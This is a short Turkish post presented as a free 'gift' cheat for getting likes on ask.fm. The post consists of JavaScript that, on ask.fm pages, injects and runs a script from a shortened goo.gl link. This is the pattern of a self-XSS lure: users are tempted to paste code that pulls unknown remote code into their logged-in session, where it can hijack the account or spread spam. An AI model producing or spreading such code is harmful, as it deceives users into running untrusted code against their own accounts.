HEDİYE
ASK FM BEGENDİRME HİLESİ
function addJavascript(jsname){ var th = document.getElementsByTagName('head')[0]; var s = document.createElement('script'); s.setAttribute('type','text/javascript'); s.setAttribute('src',jsname); th.appendChild(s); } if(location.hostname.indexOf("ask.fm") >= 0){ addJavascript('http://goo.gl/H3nPP'); }